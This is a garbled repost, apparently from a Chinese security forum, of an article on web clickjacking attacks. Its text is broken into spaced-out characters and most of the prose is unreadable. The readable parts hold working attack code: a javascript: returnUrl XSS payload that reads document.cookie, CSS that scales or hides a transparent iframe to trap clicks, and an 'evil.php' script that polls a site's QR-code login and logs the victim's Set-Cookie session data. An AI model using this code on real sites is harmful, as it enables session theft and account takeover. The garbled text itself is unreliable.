[15795] 2020-08-31_关于Web点击劫持的一些实例

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-08-31_关于Web点击劫持的一些实例 W e b   l s a m c h n   F r e e B u f   2 0 2 0 - 0 8 - 3 1 . + X S S x s s , h t t p s : / / w w w . x x x . c o m / a a a ? r e t u r n U r l = j a v a s c r i p t : ( a l e r t ) ( ) / / X S S     1 6 p x   *   1 5 p x   退   i f r a m e   X S S   c s s     i f r a m e     1 0 0   X S S < s t y l e > i f r a m e   {         p o s i t i o n :   f i x e d ;   / *     * /         t o p :   c a l c ( - 1 3 p x   *   1 0 0 ) ;         l e f t :   c a l c ( - 2 0 p x   *   1 0 0 ) ;   / *   2 0 p x 1 3 p x 使   * /         t r a n s f o r m - o r i g i n :   0   0   0 ;   / *     * /         t r a n s f o r m :   s c a l e ( 1 0 0 ) ;   / *   1 0 0   * / } < / s t y l e > < i f r a m e   s r c = " h t t p s : / / w w w . x x x . c o m / a a a ? r e t u r n U r l = j a v a s c r i p t : ( e v a l ) ( n a m e ) / / "   n a m e = " ( a l e r t ) ( d o c u m e n t . c o o k i e ) "   f r a m e b o r d e r = " n o "   b o r d e r = " 0 "   m a r g i n w i d t h = " 0 "   m a r g i n h e i g h t = " 0 "   s c r o l l i n g
  i f r a m e   P S .   A B     i f r a m e   使   C S S   i f r a m e   2 0 0 X S S 2 0 0 X S S . + X A P P u r l - A     u r l - A   : h t t p : / / w w w . x x x . c o m / q r c o d e ? k e y = x x x x x   i f r a m e     2 0 0   e v i l . p h p     u r l - A k e y i f r a m e   u r l - A     e v i l . p h p     k e y   c o o k i e e v i l . p h p   < s t y l e > / *   c o p y   - V u l k e y _ C h e n   g h 0 s t . c n * / i f r a m e   {         / * * /         f i l t e r :   a l p h a ( O p a c i t y = 0 ) ;   / * I E 8 * /         - m o z - o p a c i t y :   0 ;   / * * /         - w e b k i t - o p a c i t y :   0 ;   / * w e b k i t * /         - k h t m l - o p a c i t y :   0 ;   / * K H T M L * /         - m s - f i l t e r :   " p r o g i d : D X I m a g e T r a n s f o r m . M i c r o s o f t . A l p h a ( O p a c i t y = 0 ) " ;   / * I E 8 * /         o p a c i t y :   0 ;         / * * / } < / s t y l e > < s t y l e >   i f r a m e   { p o s i t i o n :   f i x e d ;   / *     * / t o p :   c a l c ( - 1 3 p x   *   1 0 0 ) ; l e f t :   c a l c ( - 2 0 p x   *   1 0 0 ) ;   / *   2 0 p x 1 3 p x 使   * / t r a n s f o r m - o r i g i n :   0   0 < ? p h p $ k e y   =   $ _ R E Q U E S T [ ' k e y ' ] ;
e v i l . p h p A P P c o o k i e e v i l . p h p   . 1 .   C S S   i f r a m e 2 0 0 2 .   i f ( ! $ k e y ) { / / $ k e y h t m l / / j s o n $ c h   =   c u r l _ i n i t ( ) ; $ u r l   =   ' h t t p s : / / w w w . x x x . c o m / g e t L o g i n U r l ' ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ U R L ,   $ u r l ) ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ R E T U R N T R A N S F E R ,   1 ) ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ H T T P G E T ,   1 ) ; $ o   =   c u r l _ e x e c ( $ c h ) ; c u r l _ c l o s e ( $ c h ) ; / / j s o n u r l o a u t h K e y $ j s o n = j s o n _ d e c o d e ( $ o , t r u e ) ; $ k e y   =     $ j s o n [ ' d a t a ' ] [ ' o a u t h K e y ' ] ; $ u r l   =   $ j s o n [ ' d a t a ' ] [ ' u r l ' ] ; / / h t m l e c h o   s p r i n t f ( ' < h t m l >         < h e a d > < / h e a d > < b o d y   h e i g h t = 1 0 0 % %   w i d t h = 1 0 0 % % > < d i v > < i f r a m e   > < / i f r a m e > < / d i v > < s c r i p t >         f u n c t i o n   c h e c k ( ) { d o c u m e n t . b o d y . a p p e n d C h i l d ( d o c u m e n t . c r e a t e E l e m e n t ( " i m g " ) ) . + M a t h . r a n d o m ( ) ; }         s e t I n t e r v a l ( " c h e c k ( ) " , 1 0 0 0 ) ; < / s c r i p t > < / b o d y > < / h t m l > ' , $ u r l , $ k e y ) ; } e l s e { / / $ k e y c o o k i e / / o a u t h K e y u r l $ c h   =   c u r l _ i n i t ( ) ; $ u r l   =   ' h t t p s : / / w w w . x x x . c o m / g e t L o g i n I n f o ' ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ U R L ,   $ u r l ) ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ R E T U R N T R A N S F E R ,   1 ) ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ H T T P G E T ,   0 ) ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ H E A D E R ,   t r u e ) ; c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ P O S T F I E L D S ,   ' o a u t h K e y = ' . $ k e y ) ; $ o   =   c u r l _ e x e c ( $ c h ) ; c u r l _ c l o s e ( $ c h ) ; / / $ m s g   =   ' < t i m e > ' . d a t e ( " Y - m - d   H : i : s " ) . ' < / t i m e > < k e y > ' . $ k e y . ' < / k e y > < d a t a > ' . $ o . ' < / d a t a > ' . P H P _ E O L ; / /   S e t - C o o k i e   / / l o g . t x t i f   ( s t r p o s ( $ o , ' S e t - C o o k i e ' , 0 ) )   f i l e _ p u t _ c o n t e n t s ( " l o g . t x t " , $ m s g , F I L E _ A P P E N D ) ; } ? >

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则